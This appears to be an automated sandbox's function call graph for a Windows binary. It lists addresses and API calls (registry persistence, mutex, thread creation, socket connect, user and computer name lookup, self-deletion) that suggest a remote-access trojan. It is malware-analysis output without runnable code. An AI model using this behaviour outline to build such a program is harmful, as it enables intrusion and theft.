43bf02 46603 43bf1f LeaveCriticalSection std::_Lockit::~_Lockit 46599->46603 46600->46599 46604 4497ec 37 API calls 2 library calls 46600->46604 46602->46592 46603->46592 46604->46600 46605 434918 46606 434924 ___DestructExceptionObject 46605->46606 46632 434627 46606->46632 46608 43492b 46610 434954 46608->46610 46930 434a8a IsProcessorFeaturePresent IsDebuggerPresent SetUnhandledExceptionFilter UnhandledExceptionFilter ___scrt_fastfail 46608->46930 46619 434993 ___scrt_is_nonwritable_in_current_image ___scrt_release_startup_lock 46610->46619 46931 4442d2 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 46610->46931 46612 43496d 46614 434973 ___DestructExceptionObject 46612->46614 46932 444276 5 API calls __ehhandler$?ConvertBSTRToString@_com_util@@YGPADPAG@Z 46612->46932 46615 4349f3 46643 434ba5 46615->46643 46619->46615 46933 443487 36 API calls 6 library calls 46619->46933 46625 434a15 46626 434a1f 46625->46626 46935 4434bf 28 API calls _Atexit 46625->46935 46628 434a28 46626->46628 46936 443462 28 API calls _Atexit 46626->46936 46937 43479e 13 API calls 2 library calls 46628->46937 46631 434a30 46631->46614 46633 434630 46632->46633 46938 434cb6 IsProcessorFeaturePresent 46633->46938 46635 43463c 46939 438fb1 10 API calls 4 library calls 46635->46939 46637 434641 46638 434645 46637->46638 46940 44415f IsProcessorFeaturePresent SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 46637->46940 46638->46608 46640 43464e 46641 43465c 46640->46641 46941 438fda 8 API calls 3 library calls 46640->46941 46641->46608 46942 436f10 46643->46942 46646 4349f9 46647 444223 46646->46647 46944 44f0d9 46647->46944 46649 44422c 46650 434a02 46649->46650 46948 446895 36 API calls 46649->46948 46652 40ea00 46650->46652 46950 41cbe1 LoadLibraryA GetProcAddress 46652->46950 46654 40ea1c GetModuleFileNameW 46955 40f3fe 46654->46955 46656 40ea38 46970 4020f6 46656->46970 46659 4020f6 28 API calls 46660 40ea56 46659->46660 46976 41beac 46660->46976 46664 40ea68 47002 401e8d 46664->47002 46666 40ea71 46667 40ea84 46666->46667 46668 40eace 46666->46668 47266 40fbee 97 API calls 46667->47266 47008 401e65 46668->47008 46671 40ea96 46673 401e65 22 API calls 46671->46673 46672 40eade 46675 401e65 22 API calls 46672->46675 46674 40eaa2 46673->46674 47267 410f72 36 API calls __EH_prolog 46674->47267 46676 40eafd 46675->46676 47013 40531e 46676->47013 46679 40eb0c 47018 406383 46679->47018 46680 40eab4 47268 40fb9f 78 API calls 46680->47268 46684 40eabd 47269 40f3eb 71 API calls 46684->47269 46690 401fd8 11 API calls 46692 40ef36 46690->46692 46691 401fd8 11 API calls 46693 40eb36 46691->46693 46934 443396 GetModuleHandleW 46692->46934 46694 401e65 22 API calls 46693->46694 46695 40eb3f 46694->46695 47035 401fc0 46695->47035 46697 40eb4a 46698 401e65 22 API calls 46697->46698 46699 40eb63 46698->46699 46700 401e65 22 API calls 46699->46700 46701 40eb7e 46700->46701 46702 40ebe9 46701->46702 47270 406c59 46701->47270 46703 401e65 22 API calls 46702->46703 46709 40ebf6 46703->46709 46705 40ebab 46706 401fe2 28 API calls 46705->46706 46707 40ebb7 46706->46707 46708 401fd8 11 API calls 46707->46708 46711 40ebc0 46708->46711 46710 40ec3d 46709->46710 46715 413584 3 API calls 46709->46715 47039 40d0a4 46710->47039 47275 413584 RegOpenKeyExA 46711->47275 46713 40ec43 46714 40eac6 46713->46714 47042 41b354 46713->47042 46714->46690 46721 40ec21 46715->46721 46719 40f38a 47358 4139e4 30 API calls 46719->47358 46720 40ec5e 46722 40ecb1 46720->46722 47059 407751 46720->47059 46721->46710 47278 4139e4 30 API calls 46721->47278 46724 401e65 22 API calls 46722->46724 46727 40ecba 46724->46727 46736 40ecc6 46727->46736 46737 40eccb 46727->46737 46729 40f3a0 47359 4124b0 65 API calls ___scrt_fastfail 46729->47359 46730 40ec87 46734 401e65 22 API calls 46730->46734 46731 40ec7d 47279 407773 30 API calls 46731->47279 46745 40ec90 46734->46745 46735 40f3aa 46739 41bcef 28 API calls 46735->46739 47282 407790 CreateProcessA CloseHandle CloseHandle ___scrt_fastfail 46736->47282 46742 401e65 22 API calls 46737->46742 46738 40ec82 47280 40729b 98 API calls 46738->47280 46743 40f3ba 46739->46743 46744 40ecd4 46742->46744 47168 413a5e RegOpenKeyExW 46743->47168 47063 41bcef 46744->47063 46745->46722 46750 40ecac 46745->46750 46748 40ecdf 47067 401f13 46748->47067 47281 40729b 98 API calls 46750->47281 46754 401f09 11 API calls 46756 40f3d7 46754->46756 46758 401f09 11 API calls 46756->46758 46760 40f3e0 46758->46760 46759 401e65 22 API calls 46761 40ecfc 46759->46761 47171 40dd7d 46760->47171 46765 401e65 22 API calls 46761->46765 46767 40ed16 46765->46767 46766 40f3ea 46768 401e65 22 API calls 46767->46768 46769 40ed30 46768->46769 46770 401e65 22 API calls 46769->46770 46771 40ed49 46770->46771 46772 40edb6 46771->46772 46773 401e65 22 API calls 46771->46773 46774 40edc5 46772->46774 46780 40ef41 ___scrt_fastfail 46772->46780 46778 40ed5e _wcslen 46773->46778 46775 40edce 46774->46775 46803 40ee4a ___scrt_fastfail 46774->46803 46776 401e65 22 API calls 46775->46776 46777 40edd7 46776->46777 46779 401e65 22 API calls 46777->46779 46778->46772 46782 401e65 22 API calls 46778->46782 46781 40ede9 46779->46781 47343 413733 RegOpenKeyExA 46780->47343 46785 401e65 22 API calls 46781->46785 46783 40ed79 46782->46783 46786 401e65 22 API calls 46783->46786 46787 40edfb 46785->46787 46788 40ed8e 46786->46788 46790 401e65 22 API calls 46787->46790 47283 40da6f 46788->47283 46789 40ef8c 46791 401e65 22 API calls 46789->46791 46793 40ee24 46790->46793 46794 40efb1 46791->46794 46799 401e65 22 API calls 46793->46799 47089 402093 46794->47089 46796 401f13 28 API calls 46798 40edad 46796->46798 46801 401f09 11 API calls 46798->46801 46802 40ee35 46799->46802 46800 40efc3 47095 4137aa RegCreateKeyA 46800->47095 46801->46772 47341 40ce34 46 API calls _wcslen 46802->47341 47079 413982 46803->47079 46807 40ee45 46807->46803 46809 40eede ctype 46812 401e65 22 API calls 46809->46812 46810 401e65 22 API calls 46811 40efe5 46810->46811 47101 43bb2c 46811->47101 46813 40eef5 46812->46813 46813->46789 46816 40ef09 46813->46816 46819 401e65 22 API calls 46816->46819 46817 40effc 47346 41ce2c 88 API calls ___scrt_fastfail 46817->47346 46818 40f01f 46823 402093 28 API calls 46818->46823 46820 40ef12 46819->46820 46824 41bcef 28 API calls 46820->46824 46822 40f003 CreateThread 46822->46818 48228 41d4ee 10 API calls 46822->48228 46825 40f034 46823->46825 46826 40ef1e 46824->46826 46827 402093 28 API calls 46825->46827 47342 40f4af 107 API calls 46826->47342 46829 40f043 46827->46829 47105 41b580 46829->47105 46830 40ef23 46830->46789 46832 40ef2a 46830->46832 46832->46714 46834 401e65 22 API calls 46835 40f054 46834->46835 46836 401e65 22 API calls 46835->46836 46837 40f066 46836->46837 46838 401e65 22 API calls 46837->46838 46839 40f086 46838->46839 46840 43bb2c 40 API calls 46839->46840 46841 40f093 46840->46841 46842 401e65 22 API calls 46841->46842 46843 40f09e 46842->46843 46844 401e65 22 API calls 46843->46844 46845 40f0af 46844->46845 46846 401e65 22 API calls 46845->46846 46847 40f0c4 46846->46847 46848 401e65 22 API calls 46847->46848 46849 40f0d5 46848->46849 46850 40f0dc StrToIntA 46849->46850 47129 409e1f 46850->47129 46853 401e65 22 API calls 46854 40f0f7 46853->46854 46855 40f103 46854->46855 46856 40f13c 46854->46856 47347 43455e 46855->47347 46859 401e65 22 API calls 46856->46859 46861 40f14c 46859->46861 46860 401e65 22 API calls 46862 40f11f 46860->46862 46864 40f194 46861->46864 46865 40f158 46861->46865 46863 40f126 CreateThread 46862->46863 46863->46856 48232 41a045 110 API calls __EH_prolog 46863->48232 46866 401e65 22 API calls 46864->46866 46867 43455e new 22 API calls 46865->46867 46868 40f19d 46866->46868 46869 40f161 46867->46869 46872 40f207 46868->46872 46873 40f1a9 46868->46873 46870 401e65 22 API calls 46869->46870 46871 40f173 46870->46871 46874 40f17a CreateThread 46871->46874 46875 401e65 22 API calls 46872->46875 46876 401e65 22 API calls 46873->46876 46874->46864 48231 41a045 110 API calls __EH_prolog 46874->48231 46877 40f210 46875->46877 46878 40f1b9 46876->46878 46879 40f255 46877->46879 46880 40f21c 46877->46880 46881 401e65 22 API calls 46878->46881 47154 41b69e GetComputerNameExW GetUserNameW 46879->47154 46883 401e65 22 API calls 46880->46883 46884 40f1ce 46881->46884 46886 40f225 46883->46886 47354 40da23 32 API calls 46884->47354 46890 401e65 22 API calls 46886->46890 46887 401f13 28 API calls 46889 40f269 46887->46889 46892 401f09 11 API calls 46889->46892 46893 40f23a 46890->46893 46891 40f1e1 46894 401f13 28 API calls 46891->46894 46895 40f272 46892->46895 46904 43bb2c 40 API calls 46893->46904 46896 40f1ed 46894->46896 46897 40f27b SetProcessDEPPolicy 46895->46897 46898 40f27e CreateThread 46895->46898 46901 401f09 11 API calls 46896->46901 46897->46898 46899 40f293 CreateThread 46898->46899 46900 40f29f 46898->46900 48200 40f7e2 46898->48200 46899->46900 48227 412132 139 API calls 46899->48227 46902 40f2b4 46900->46902 46903 40f2a8 CreateThread 46900->46903 46905 40f1f6 CreateThread 46901->46905 46907 40f307 46902->46907 46909 402093 28 API calls 46902->46909 46903->46902 48229 412716 38 API calls ___scrt_fastfail 46903->48229 46906 40f247 46904->46906 46905->46872 48230 401be9 50 API calls 46905->48230 47355 40c19d 7 API calls 46906->47355 47165 41353a RegOpenKeyExA 46907->47165 46910 40f2d7 46909->46910 47356 4052fd 28 API calls 46910->47356 46915 40f328 46917 41bcef 28 API calls 46915->46917 46919 40f338 46917->46919 47357 413656 31 API calls 46919->47357 46924 40f34e 46925 401f09 11 API calls 46924->46925 46928 40f359 46925->46928 46926 40f381 DeleteFileW 46927 40f388 46926->46927 46926->46928 46927->46735 46928->46735 46928->46926 46929 40f36f Sleep 46928->46929 46929->46928 46930->46608 46931->46612 46932->46619 46933->46615 46934->46625 46935->46626 46936->46628 46937->46631 46938->46635 46939->46637 46940->46640 46941->46638 46943 434bb8 GetStartupInfoW 46942->46943 46943->46646 46945 44f0eb 46944->46945 46946 44f0e2 46944->46946 46945->46649 46949 44efd8 49 API calls 5 library calls 46946->46949 46948->46649 46949->46945 46951 41cc20 LoadLibraryA GetProcAddress 46950->46951 46952 41cc10 GetModuleHandleA GetProcAddress 46950->46952 46953 41cc49 44 API calls 46951->46953 46954 41cc39 LoadLibraryA GetProcAddress 46951->46954 46952->46951 46953->46654 46954->46953 47360 41b539 FindResourceA 46955->47360 46959 40f428 ctype 47370 4020b7 46959->47370 46962 401fe2 28 API calls 46963 40f44e 46962->46963 46964 401fd8 11 API calls 46963->46964 46965 40f457 46964->46965 46966 43bda0 _Yarn 21 API calls 46965->46966 46967 40f468 ctype 46966->46967 47376 406e13 46967->47376 46969 40f49b 46969->46656 46971 40210c 46970->46971 46972 4023ce 11 API calls 46971->46972 46973 402126 46972->46973 46974 402569 28 API calls 46973->46974 46975 402134 46974->46975 46975->46659 47413 4020df 46976->47413 46978 41bf2f 46979 401fd8 11 API calls 46978->46979 46980 41bf61 46979->46980 46982 401fd8 11 API calls 46980->46982 46981 41bf31 47429 4041a2 28 API calls 46981->47429 46984 41bf69 46982->46984 46987 401fd8 11 API calls 46984->46987 46986 41bf3d 46988 401fe2 28 API calls 46986->46988 46990 40ea5f 46987->46990 46991 41bf46 46988->46991 46989 401fe2 28 API calls 46997 41bebf 46989->46997 46998 40fb52 46990->46998 46992 401fd8 11 API calls 46991->46992 46994 41bf4e 46992->46994 46993 401fd8 11 API calls 46993->46997 46995 41cec5 28 API calls 46994->46995 46995->46978 46997->46978 46997->46981 46997->46989 46997->46993 47417 4041a2 28 API calls 46997->47417 47418 41cec5 46997->47418 46999 40fb5e 46998->46999 47001 40fb65 46998->47001 47455 402163 11 API calls 46999->47455 47001->46664 47003 402163 47002->47003 47004 40219f 47003->47004 47456 402730 11 API calls 47003->47456 47004->46666 47006 402184 47457 402712 11 API calls std::_Deallocate 47006->47457 47009 401e6d 47008->47009 47011 401e75 47009->47011 47458 402158 22 API calls 47009->47458 47011->46672 47014 4020df 11 API calls 47013->47014 47015 40532a 47014->47015 47459 4032a0 47015->47459 47017 405346 47017->46679 47464 4051ef 47018->47464 47020 406391 47468 402055 47020->47468 47023 401fe2 47024 401ff1 47023->47024 47031 402039 47023->47031 47025 4023ce 11 API calls 47024->47025 47026 401ffa 47025->47026 47027 402015 47026->47027 47028 40203c 47026->47028 47502 403098 28 API calls 47027->47502 47029 40267a 11 API calls 47028->47029 47029->47031 47032 401fd8 47031->47032 47033 4023ce 11 API calls 47032->47033 47034 401fe1 47033->47034 47034->46691 47036 401fd2 47035->47036 47037 401fc9 47035->47037 47036->46697 47503 4025e0 28 API calls 47037->47503 47504 401fab 47039->47504 47041 40d0ae CreateMutexA GetLastError 47041->46713 47505 41c048 47042->47505 47047 401fe2 28 API calls 47048 41b390 47047->47048 47049 401fd8 11 API calls 47048->47049 47050 41b398 47049->47050 47051 4135e1 31 API calls 47050->47051 47053 41b3ee 47050->47053 47052 41b3c1 47051->47052 47054 41b3cc StrToIntA 47052->47054 47053->46720 47055 41b3e3 47054->47055 47056 41b3da 47054->47056 47058 401fd8 11 API calls 47055->47058 47514 41cffa 22 API calls 47056->47514 47058->47053 47060 407765 47059->47060 47061 413584 3 API calls 47060->47061 47062 40776c 47061->47062 47062->46730 47062->46731 47064 41bd03 47063->47064 47515 40b93f 47064->47515 47066 41bd0b 47066->46748 47068 401f22 47067->47068 47075 401f6a 47067->47075 47069 402252 11 API calls 47068->47069 47070 401f2b 47069->47070 47071 401f6d 47070->47071 47073 401f46 47070->47073 47548 402336 47071->47548 47547 40305c 28 API calls 47073->47547 47076 401f09 47075->47076 47077 402252 11 API calls 47076->47077 47078 401f12 47077->47078 47078->46759 47080 4139a0 47079->47080 47081 406e13 28 API calls 47080->47081 47082 4139b5 47081->47082 47083 4020f6 28 API calls 47082->47083 47084 4139c5 47083->47084 47085 4137aa 14 API calls 47084->47085 47086 4139cf 47085->47086 47087 401fd8 11 API calls 47086->47087 47088 4139dc 47087->47088 47088->46809 47090 40209b 47089->47090 47091 4023ce 11 API calls 47090->47091 47092 4020a6 47091->47092 47552 4024ed 47092->47552 47096 4137fa 47095->47096 47098 4137c3 47095->47098 47097 401fd8 11 API calls 47096->47097 47099 40efd9 47097->47099 47100 4137d5 RegSetValueExA RegCloseKey 47098->47100 47099->46810 47100->47096 47102 43bb45 _swprintf 47101->47102 47556 43ae83 47102->47556 47104 40eff2 47104->46817 47104->46818 47106 41b631 47105->47106 47107 41b596 GetLocalTime 47105->47107 47108 401fd8 11 API calls 47106->47108 47109 40531e 28 API calls 47107->47109 47110 41b639 47108->47110 47111 41b5d8 47109->47111 47113 401fd8 11 API calls 47110->47113 47112 406383 28 API calls 47111->47112 47114 41b5e4 47112->47114 47115 40f048 47113->47115 47584 402f10 47114->47584 47115->46834 47118 406383 28 API calls 47119 41b5fc 47118->47119 47589 40723b 77 API calls 47119->47589 47121 41b60a 47122 401fd8 11 API calls 47121->47122 47123 41b616 47122->47123 47124 401fd8 11 API calls 47123->47124 47125 41b61f 47124->47125 47126 401fd8 11 API calls 47125->47126 47127 41b628 47126->47127 47128 401fd8 11 API calls 47127->47128 47128->47106 47130 409e3d _wcslen 47129->47130 47131 409e48 47130->47131 47132 409e5f 47130->47132 47133 40da6f 32 API calls 47131->47133 47134 40da6f 32 API calls 47132->47134 47135 409e50 47133->47135 47136 409e67 47134->47136 47137 401f13 28 API calls 47135->47137 47138 401f13 28 API calls 47136->47138 47153 409e5a 47137->47153 47139 409e75 47138->47139 47140 401f09 11 API calls 47139->47140 47142 409e7d 47140->47142 47141 401f09 11 API calls 47143 409eb4 47141->47143 47608 409196 28 API calls 47142->47608 47593 40a144 47143->47593 47146 409e8f 47609 403014 47146->47609 47150 401f13 28 API calls 47151 409ea4 47150->47151 47152 401f09 11 API calls 47151->47152 47152->47153 47153->47141 47813 40417e 47154->47813 47159 403014 28 API calls 47160 41b703 47159->47160 47161 401f09 11 API calls 47160->47161 47162 41b70c 47161->47162 47163 401f09 11 API calls 47162->47163 47164 40f25e 47163->47164 47164->46887 47166 41355b RegQueryValueExA RegCloseKey 47165->47166 47167 40f31f 47165->47167 47166->47167 47167->46760 47167->46915 47169 40f3cd 47168->47169 47170 413a7a RegDeleteValueW 47168->47170 47169->46754 47170->47169 47172 40dd96 47171->47172 47173 41353a 3 API calls 47172->47173 47174 40dd9d 47173->47174 47175 40ddbc 47174->47175 47905 401707 47174->47905 47179 414f65 47175->47179 47177 40ddaa 47908 4138b2 RegCreateKeyA 47177->47908 47180 4020df 11 API calls 47179->47180 47181 414f79 47180->47181 47922 41b944 47181->47922 47184 4020df 11 API calls 47185 414f8f 47184->47185 47186 401e65 22 API calls 47185->47186 47187 414f9d 47186->47187 47188 43bb2c 40 API calls 47187->47188 47189 414faa 47188->47189 47190 414fbc 47189->47190 47191 414faf Sleep 47189->47191 47192 402093 28 API calls 47190->47192 47191->47190 47193 414fcb 47192->47193 47194 401e65 22 API calls 47193->47194 47195 414fd4 47194->47195 47196 4020f6 28 API calls 47195->47196 47197 414fdf 47196->47197 47198 41beac 28 API calls 47197->47198 47199 414fe7 47198->47199 47926 40489e WSAStartup 47199->47926 47201 414ff1 47202 401e65 22 API calls 47201->47202 47203 414ffa 47202->47203 47204 401e65 22 API calls 47203->47204 47229 415079 47203->47229 47205 415013 47204->47205 47206 401e65 22 API calls 47205->47206 47207 415024 47206->47207 47210 401e65 22 API calls 47207->47210 47208 41beac 28 API calls 47208->47229 47209 401e65 22 API calls 47209->47229 47211 415035 47210->47211 47213 401e65 22 API calls 47211->47213 47212 406c59 28 API calls 47212->47229 47214 415046 47213->47214 47216 401e65 22 API calls 47214->47216 47215 401fe2 28 API calls 47215->47229 47217 415057 47216->47217 47218 401e65 22 API calls 47217->47218 47219 415069 47218->47219 48077 40473d 89 API calls 47219->48077 47221 402093 28 API calls 47221->47229 47222 41b580 80 API calls 47222->47229 47224 4151c7 WSAGetLastError 48078 41cb72 30 API calls 47224->48078 47229->47208 47229->47209 47229->47212 47229->47215 47229->47221 47229->47222 47229->47224 47232 40531e 28 API calls 47229->47232 47234 401e8d 11 API calls 47229->47234 47235 415a6e 47229->47235 47237 406383 28 API calls 47229->47237 47241 409097 28 API calls 47229->47241 47242 441ed1 20 API calls 47229->47242 47243 4020f6 28 API calls 47229->47243 47244 413733 3 API calls 47229->47244 47245 4135e1 31 API calls 47229->47245 47246 40417e 28 API calls 47229->47246 47249 401e65 22 API calls 47229->47249 47253 41bc1f 28 API calls 47229->47253 47255 41bdaf 28 API calls 47229->47255 47258 402f10 28 API calls 47229->47258 47259 402ea1 28 API calls 47229->47259 47261 401fd8 11 API calls 47229->47261 47262 401f09 11 API calls 47229->47262 47265 415aac CreateThread 47229->47265 47927 414f24 47229->47927 47932 40482d 47229->47932 47939 404f51 47229->47939 47954 4048c8 connect 47229->47954 48014 41b871 47229->48014 48017 4145f8 47229->48017 48020 40ddc4 47229->48020 48026 41bcd3 47229->48026 48029 41bb77 GetLastInputInfo GetTickCount 47229->48029 48030 41bb27 47229->48030 48035 40f90c GetLocaleInfoA 47229->48035 48038 402f31 47229->48038 48043 404aa1 47229->48043 48058 404c10 47229->48058 48079 4052fd 28 API calls 47229->48079 48081 404e26 WaitForSingleObject 47229->48081 47232->47229 47233 401e65 22 API calls 47233->47235 47234->47229 47235->47233 47236 43bb2c 40 API calls 47235->47236 48080 40b08c 85 API calls 47235->48080 47238 415b0a Sleep 47236->47238 47237->47229 47238->47229 47241->47229 47242->47229 47243->47229 47244->47229 47245->47229 47246->47229 47250 415474 GetTickCount 47249->47250 47251 41bc1f 28 API calls 47250->47251 47251->47229 47253->47229 47255->47229 47258->47229 47259->47229 47261->47229 47262->47229 47265->47229 48190 41ada8 106 API calls 47265->48190 47266->46671 47267->46680 47268->46684 47271 4020df 11 API calls 47270->47271 47272 406c65 47271->47272 47273 4032a0 28 API calls 47272->47273 47274 406c82 47273->47274 47274->46705 47276 40ebdf 47275->47276 47277 4135ae RegQueryValueExA RegCloseKey 47275->47277 47276->46702 47276->46719 47277->47276 47278->46710 47279->46738 47280->46730 47281->46722 47282->46737 47284 401f86 11 API calls 47283->47284 47285 40da8b 47284->47285 47286 40dae0 47285->47286 47287 40daa1 47285->47287 47288 40daab 47285->47288 47291 41c048 2 API calls 47286->47291 47290 40dbd4 GetLongPathNameW 47287->47290 48191 41b645 29 API calls 47288->48191 47293 40417e 28 API calls 47290->47293 47294 40dae5 47291->47294 47292 40dab4 47297 401f13 28 API calls 47292->47297 47298 40dbe9 47293->47298 47295 40dae9 47294->47295 47296 40db3b 47294->47296 47300 40417e 28 API calls 47295->47300 47299 40417e 28 API calls 47296->47299 47301 40dabe 47297->47301 47302 40417e 28 API calls 47298->47302 47303 40db49 47299->47303 47304 40daf7 47300->47304 47307 401f09 11 API calls 47301->47307 47305 40dbf8 47302->47305 47310 40417e 28 API calls 47303->47310 47311 40417e 28 API calls 47304->47311 48194 40de0c 28 API calls 47305->48194 47307->47287 47308 40dc0b 48195 402fa5 28 API calls 47308->48195 47313 40db5f 47310->47313 47314 40db0d 47311->47314 47312 40dc16 48196 402fa5 28 API calls 47312->48196 48193 402fa5 28 API calls 47313->48193 48192 402fa5 28 API calls 47314->48192 47318 40dc20 47321 401f09 11 API calls 47318->47321 47319 40db6a 47322 401f13 28 API calls 47319->47322 47320 40db18 47323 401f13 28 API calls 47320->47323 47324 40dc2a 47321->47324 47325 40db75 47322->47325 47326 40db23 47323->47326 47327 401f09 11 API calls 47324->47327 47328 401f09 11 API calls 47325->47328 47329 401f09 11 API calls 47326->47329 47330 40dc33 47327->47330 47331 40db7e 47328->47331 47332 40db2c 47329->47332 47333 401f09 11 API calls 47330->47333 47334 401f09 11 API calls 47331->47334 47335 401f09 11 API calls 47332->47335 47336 40dc3c 47333->47336 47334->47301 47335->47301 47337 401f09 11 API calls 47336->47337 47338 40dc45 47337->47338 47339 401f09 11 API calls 47338->47339 47340 40dc4e 47339->47340 47340->46796 47341->46807 47342->46830 47344 413759 RegQueryValueExA RegCloseKey 47343->47344 47345 41377d 47343->47345 47344->47345 47345->46789 47346->46822 47349 434563 47347->47349 47348 43bda0 _Yarn 21 API calls 47348->47349 47349->47348 47350 40f10c 47349->47350 48197 443001 7 API calls 2 library calls 47349->48197 48198 434c99 RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47349->48198 48199 4352fb RaiseException Concurrency::cancel_current_task __CxxThrowException@8 47349->48199 47350->46860 47354->46891 47355->46879 47357->46924 47358->46729 47361 41b556 LoadResource LockResource SizeofResource 47360->47361 47362 40f419 47360->47362 47361->47362 47363 43bda0 47362->47363 47368 4461b8 ___crtLCMapStringA 47363->47368 47364 4461f6 47380 44062d 20 API calls __dosmaperr 47364->47380 47365 4461e1 RtlAllocateHeap 47367 4461f4 47365->47367 47365->47368 47367->46959 47368->47364 47368->47365 47379 443001 7 API calls 2 library calls 47368->47379 47371 4020bf 47370->47371 47381 4023ce 47371->47381 47373 4020ca 47385 40250a 47373->47385 47375 4020d9 47375->46962 47377 4020b7 28 API calls 47376->47377 47378 406e27 47377->47378 47378->46969 47379->47368 47380->47367 47382 402428 47381->47382 47383 4023d8 47381->47383 47382->47373 47383->47382 47392 4027a7 11 API calls std::_Deallocate 47383->47392 47386 40251a 47385->47386 47387 402520 47386->47387 47388 402535 47386->47388 47393 402569 47387->47393 47403 4028e8 28 API calls 47388->47403 47391 402533 47391->47375 47392->47382 47404 402888 47393->47404 47395 40257d 47396 402592 47395->47396 47397 4025a7 47395->47397 47409 402a34 22 API calls 47396->47409 47411 4028e8 28 API calls 47397->47411 47400 40259b 47410 4029da 22 API calls 47400->47410 47402 4025a5 47402->47391 47403->47391 47405 402890 47404->47405 47406 402898 47405->47406 47412 402ca3 22 API calls 47405->47412 47406->47395 47409->47400 47410->47402 47411->47402 47414 4020e7 47413->47414 47415 4023ce 11 API calls 47414->47415 47416 4020f2 47415->47416 47416->46997 47417->46997 47419 41ced2 47418->47419 47420 41cf31 47419->47420 47421 41cee2 47419->47421 47422 41d071 28 API calls 47420->47422 47423 41cf4b 47420->47423 47425 41cf1a 47421->47425 47430 41d071 47421->47430 47422->47423 47439 41d1d7 28 API calls 47423->47439 47438 41d1d7 28 API calls 47425->47438 47426 41cf2d 47426->46997 47429->46986 47432 41d079 47430->47432 47431 41d0ab 47431->47425 47432->47431 47433 41d0af 47432->47433 47436 41d093 47432->47436 47450 402725 22 API calls 47433->47450 47440 41d0e2 47436->47440 47438->47426 47439->47426 47441 41d0ec __EH_prolog 47440->47441 47451 402717 22 API calls 47441->47451 47443 41d0ff 47452 41d1ee 11 API calls 47443->47452 47445 41d125 47447 41d15d 47445->47447 47453 402730 11 API calls 47445->47453 47447->47431 47448 41d144 47454 402712 11 API calls std::_Deallocate 47448->47454 47451->47443 47452->47445 47453->47448 47454->47447 47455->47001 47456->47006 47457->47004 47461 4032aa 47459->47461 47460 4032c9 47460->47017 47461->47460 47463 4028e8 28 API calls 47461->47463 47463->47460 47465 4051fb 47464->47465 47474 405274 47465->47474 47467 405208 47467->47020 47469 402061 47468->47469 47470 4023ce 11 API calls 47469->47470 47471 40207b 47470->47471 47498 40267a 47471->47498 47475 405282 47474->47475 47476 405288 47475->47476 47477 40529e 47475->47477 47485 4025f0 47476->47485 47478 4052f5 47477->47478 47479 4052b6 47477->47479 47495 4028a4 22 API calls 47478->47495 47484 40529c 47479->47484 47494 4028e8 28 API calls 47479->47494 47484->47467 47486 402888 22 API calls 47485->47486 47487 402602 47486->47487 47488 402672 47487->47488 47489 402629 47487->47489 47497 4028a4 22 API calls 47488->47497 47493 40263b 47489->47493 47496 4028e8 28 API calls 47489->47496 47493->47484 47494->47484 47496->47493 47499 40268b 47498->47499 47500 4023ce 11 API calls 47499->47500 47501 40208d 47500->47501 47501->47023 47502->47031 47503->47036 47506 41b362 47505->47506 47507 41c055 GetCurrentProcess IsWow64Process 47505->47507 47509 4135e1 RegOpenKeyExA 47506->47509 47507->47506 47508 41c06c 47507->47508 47508->47506 47510 41360f RegQueryValueExA RegCloseKey 47509->47510 47511 413639 47509->47511 47510->47511 47512 402093 28 API calls 47511->47512 47513 41364e 47512->47513 47513->47047 47514->47055 47516 40b947 47515->47516 47521 402252 47516->47521 47518 40b952 47525 40b967 47518->47525 47520 40b961 47520->47066 47522 4022ac 47521->47522 47523 40225c 47521->47523 47522->47518 47523->47522 47532 402779 11 API calls std::_Deallocate 47523->47532 47526 40b9a1 47525->47526 47527 40b973 47525->47527 47544 4028a4 22 API calls 47526->47544 47533 4027e6 47527->47533 47531 40b97d 47531->47520 47532->47522 47534 4027ef 47533->47534 47535 402851 47534->47535 47536 4027f9 47534->47536 47546 4028a4 22 API calls 47535->47546 47539 402802 47536->47539 47542 402815 47536->47542 47545 402aea 28 API calls __EH_prolog 47539->47545 47540 402813 47540->47531 47542->47540 47543 402252 11 API calls 47542->47543 47543->47540 47545->47540 47547->47075 47549 402347 47548->47549 47550 402252 11 API calls 47549->47550 47551 4023c7 47550->47551 47551->47075 47553 4024f9 47552->47553 47554 40250a 28 API calls 47553->47554 47555 4020b1 47554->47555 47555->46800 47572 43ba8a 47556->47572 47558 43aed0 47578 43a837 36 API calls 2 library calls 47558->47578 47560 43ae95 47560->47558 47561 43aeaa 47560->47561 47571 43aeaf __cftoe 47560->47571 47577 44062d 20 API calls __dosmaperr 47561->47577 47564 43aedc 47565 43af0b 47564->47565 47579 43bacf 40 API calls __Tolower 47564->47579 47568 43af77 47565->47568 47580 43ba36 20 API calls 2 library calls 47565->47580 47581 43ba36 20 API calls 2 library calls 47568->47581 47569 43b03e _swprintf 47569->47571 47582 44062d 20 API calls __dosmaperr 47569->47582 47571->47104 47573 43baa2 47572->47573 47574 43ba8f 47572->47574 47573->47560 47583 44062d 20 API calls __dosmaperr 47574->47583 47576 43ba94 __cftoe 47576->47560 47577->47571 47578->47564 47579->47564 47580->47568 47581->47569 47582->47571 47583->47576 47590 401fb0 47584->47590 47586 402f1e 47587 402055 11 API calls 47586->47587 47588 402f2d 47587->47588 47588->47118 47589->47121 47591 4025f0 28 API calls 47590->47591 47592 401fbd 47591->47592 47592->47586 47594 40a162 47593->47594 47595 413584 3 API calls 47594->47595 47596 40a169 47595->47596 47597 40a197 47596->47597 47598 40a17d 47596->47598 47614 409097 47597->47614 47599 40a182 47598->47599 47600 409ed6 47598->47600 47603 409097 28 API calls 47599->47603 47600->46853 47605 40a190 47603->47605 47642 40a268 29 API calls 47605->47642 47607 40a195 47607->47600 47608->47146 47790 403222 47609->47790 47611 403022 47794 403262 47611->47794 47615 4090ad 47614->47615 47616 402252 11 API calls 47615->47616 47617 4090c7 47616->47617 47643 404267 47617->47643 47619 4090d5 47620 40a1b4 47619->47620 47655 40b927 47620->47655 47623 40a205 47625 402093 28 API calls 47623->47625 47624 40a1dd 47626 402093 28 API calls 47624->47626 47627 40a210 47625->47627 47628 40a1e7 47626->47628 47629 402093 28 API calls 47627->47629 47630 41bcef 28 API calls 47628->47630 47632 40a21f 47629->47632 47631 40a1f5 47630->47631 47659 40b19f 31 API calls _Yarn 47631->47659 47634 41b580 80 API calls 47632->47634 47636 40a224 CreateThread 47634->47636 47635 40a1fc 47637 401fd8 11 API calls 47635->47637 47638 40a24b CreateThread 47636->47638 47639 40a23f CreateThread 47636->47639 47667 40a2b8 47636->47667 47637->47623 47640 401f09 11 API calls 47638->47640 47664 